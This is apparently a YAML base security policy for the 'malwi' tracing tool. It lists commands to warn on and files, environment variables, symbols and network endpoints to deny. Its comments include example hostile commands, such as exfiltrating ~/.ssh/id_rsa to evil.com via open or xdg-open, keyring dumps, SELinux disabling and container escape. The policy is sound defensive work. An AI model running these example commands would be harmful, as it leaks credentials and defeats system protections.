version: 1

# Base security sections — shared across all malwi policies.
# Each specific policy file includes these sections inline.
# Reset with: malwi p base

# Warn on dangerous commands that can bypass tracing or exfiltrate data.
commands:
  warn:
    # Scripting interpreters — can execute arbitrary code, bypassing traced process
    - osascript    # AppleScript/JXA: shell access, file I/O, network via scripting bridge
    - swift        # Swift interpreter: full system access
    - java         # JVM: arbitrary code execution, network I/O
    # Data exfiltration — can leak sensitive data without network hooks seeing it
    - open         # opens URLs in browser: open "http://evil.com/?d=$(cat ~/.ssh/id_rsa)"
    - sqlite3      # queries browser credential DBs (Chrome Login Data, Safari, etc.)
    # Credential/config readers — read secrets from macOS system stores
    - plutil       # reads plist files: app tokens, Safari data, stored credentials
    - defaults     # reads macOS preferences: OAuth tokens, login items, app secrets
    # Anti-tracing — can terminate the malwi agent or CLI process
    - kill
    - pkill
    - killall
    # Linux scripting interpreters — execute arbitrary code bypassing traced process
    - gjs          # GNOME JavaScript: D-Bus, file I/O, network via GLib/Gio
    # D-Bus access — invoke privileged system services (polkit, systemd, NetworkManager)
    - dbus-send    # send D-Bus messages: reconfigure networking, read secrets
    - gdbus        # GLib D-Bus tool: gdbus call --system reads GNOME Keyring entries
    - busctl       # systemd D-Bus: busctl call org.freedesktop.systemd1 starts/stops services
    # Data exfiltration — opens URLs in browser, bypassing network hooks (Linux equivalent of open)
    - xdg-open     # xdg-open "https://evil.com/?d=$(cat ~/.ssh/id_rsa)"
    # Credential/config readers — access Linux desktop keyring and password stores
    - secret-tool  # GNOME Keyring CLI: secret-tool lookup service github
    - kwallet-query  # KDE Wallet CLI: kwallet-query -r entry kdewallet
    - kwalletcli   # alternative KDE Wallet CLI
    - keyctl       # Linux kernel keyring: keyctl read <key-id>
    - pass         # password-store CLI: pass show email/gmail dumps passwords
    # Reconnaissance — pre-indexed file search, finds *.pem, id_rsa instantly
    - locate       # locate '*.pem' finds all credential files on disk
    - mlocate      # alternative locate implementation
    - plocate      # modern locate implementation
    # Security bypass — disable Linux mandatory access controls
    - setenforce   # disable SELinux: setenforce 0 sets Permissive mode
    - aa-disable   # disable AppArmor profile: aa-disable /usr/bin/target
    - apparmor_parser  # AppArmor management: apparmor_parser -R removes profile
    - chattr       # file attributes: chattr -i /etc/passwd removes immutable flag
    - setcap       # file capabilities: setcap cap_net_raw+ep binary grants raw net
    - getcap       # recon: getcap -r / finds all capability-enabled binaries
    - debugfs      # raw ext2/3/4 access, bypasses ALL file permissions and ACLs
    - mount        # mount attacker NFS/CIFS or bind-mount for container escape
    - chroot       # change root filesystem, escape containers
    - unshare      # create namespaces: unshare -n bypasses network restrictions
    - nsenter      # enter namespaces: nsenter -t 1 -m -p escapes containers
    # Kernel/module manipulation — rootkit installation, security module removal
    - insmod       # load kernel module from file: insmod rootkit.ko
    - modprobe     # load kernel module by name (resolves dependencies)
    - rmmod        # remove kernel module: rmmod apparmor disables MAC
    - kexec        # load new kernel, bypasses secure boot and all controls
    # Process memory/injection — dump credentials from running processes via ptrace
    - strace       # trace syscalls: strace -e read -p <pid> dumps all reads
    - ltrace       # trace library calls, captures function arguments
    - gdb          # attach to process, inject code, dump memory regions
    - gcore        # dump full process core: gcore <pid> extracts all memory
    # Privilege escalation — Linux-specific
    - pkexec       # PolicyKit escalation: pkexec bash opens root shell (CVE-2021-4034)
    - newgrp       # change group: newgrp docker gains container access

# Protect sensitive files from exfiltration.
files:
  deny:
    - "~/.ssh/**"
    - "*/.ssh/**"
    - "~/.aws/**"
    - "*/.aws/**"
    - "~/.config/gcloud/**"
    - "~/.azure/**"
    - "~/.gnupg/**"
    - "~/.config/gh/**"
    - "*/.kube/config"
    - "*.pem"
    - "*.key"
    - "*id_rsa*"
    - "*id_ed25519*"
    # Linux credential stores
    - "~/.local/share/keyrings/**"     # GNOME Keyring storage files
    - "~/.local/share/kwalletd/**"     # KDE Wallet storage files
    # Linux persistence paths
    - "~/.config/autostart/**"         # XDG autostart entries
    - "~/.config/systemd/user/**"      # systemd user services
    # System-level preload (rootkit vector)
    - "/etc/ld.so.preload"             # system-wide LD_PRELOAD

# Protect sensitive environment variables.
envvars:
  deny:
    - "*SECRET*"
    - "*TOKEN*"
    - "*PASSWORD*"
    - "*API_KEY*"
    - "*PRIVATE_KEY*"
    - "AWS_*"
    - "GITHUB_*"
    - "GCP_*"
    - "AZURE_*"
    - "OPENAI_*"
    - "ANTHROPIC_*"
    - HF_TOKEN
    - DYLD_INSERT_LIBRARIES
    - LD_PRELOAD

# Block credential-interception, filesystem bypass, and raw networking functions.
symbols:
  deny:
    # Credential interception
    - getpass
    - crypt
    # Symlink/hardlink creation (bypass file path patterns)
    - symlink
    - link
    # Direct syscall wrapper
    - syscall
    # Raw networking
    - socket
    - connect
    - sendto
    - bind

# Block cloud metadata endpoints (SSRF protection).
# Warn on suspicious TLDs and anonymity networks.
network:
  deny:
    - "169.254.169.254/**"
    - "metadata.google.internal/**"
  warn:
    - "*.onion"
    - "*.i2p"
    - "*.bit"
    - "*.loki"
